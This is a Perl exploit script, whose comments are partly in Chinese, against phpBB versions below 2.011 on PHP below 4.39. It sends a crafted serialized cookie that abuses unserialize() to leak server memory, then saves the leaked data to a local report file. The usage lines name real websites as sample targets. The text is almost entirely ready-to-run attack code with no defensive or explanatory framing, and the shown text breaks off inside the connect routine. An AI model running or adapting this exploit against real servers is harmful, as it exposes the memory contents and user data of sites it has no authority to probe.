//phpbb.pl cosoft.org.cn 80 /html/forum/ 30000 phpbb2mysql
//30000 是内存大小， phpbb2mysql是cookie

#!/usr/bin/perl
#Phpbb < 2.011 &php < 4.39 unserialize () exploit
#Code by Alpha(netsh@163.com)
#qq:24266683
#Welcom To Http://www.cnwill.com/

use IO::Socket;

system('cls');

if (@ARGV != 5) {
print "\n";
print "*****************************************************\n";
print "Thanks use this programme\n";
print "This is Phpbb < 2.011 &php < 4.39 unserialize () exploit.\n\n";
print "Use：\n$0 host port path buffersize cooike\n\n";
print "e.g :\n$0 www.cnwill.com 80 /html/forum/ 30000 phpbb2mysql\n\n";
print "Code by Alpha\n";
print "*****************************************************\n";
exit(1);
}

$host = @ARGV[0];
$port = @ARGV[1];
$path = @ARGV[2];
$size = @ARGV[3];
$cookie=@ARGV[4];

#$host="www.cosoft.org.cn";

$req = "GET $path HTTP/1.1\n".
"Host: $host\n".
"Cookie: $cookie"."_data=s:$size:%22test1%22%3b; expires=Fri, 24-Dec-2005 21:25:37 GMT; path=/; domain=$host\n".
"Cookie: $cookie"."_sid=1cfd759c33ba2a45b994c7b7cfd948ec; path=/; domain=$host\n".
"Accept-Language: fr\n".
"User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)\n".
"Connection: close\n\n";

#print "$req";

#exit;
print "######Waitting...........\n\n";
@res = &connect;

$aaa =join ('',@res);

$aaa=substr ($aaa,360, 2*$size);

$aaa=~s/%../\./g;
$aaa=~s/\.\.\.\./\./g;
$aaa=~s/\.\.\./\./g;
$aaa=~s/\.\.\./\./g;
$aaa=~s/\.\./\./g;
$aaa=~s/\.\./\./g;
$aaa=~s/\..\../\n/g;
$aaa=~s/\n\n/\n/g;
$aaa=~s/\n\n/\n/g;

open(file,">>report.txt");
print file $aaa;
close(file);
# because the result is not small,so I put it in a file
print "ok,the result is in the report.txt,you can see it now!\n\n";
print "*****************************************************\n";

sub connect {
my $connection = IO::Socket::INET->new(Proto =>"tcp",
PeerAddr =>$host,
PeerPort =>$port) || die "Sorry! Could not connect to $host \n";

print $connection $req;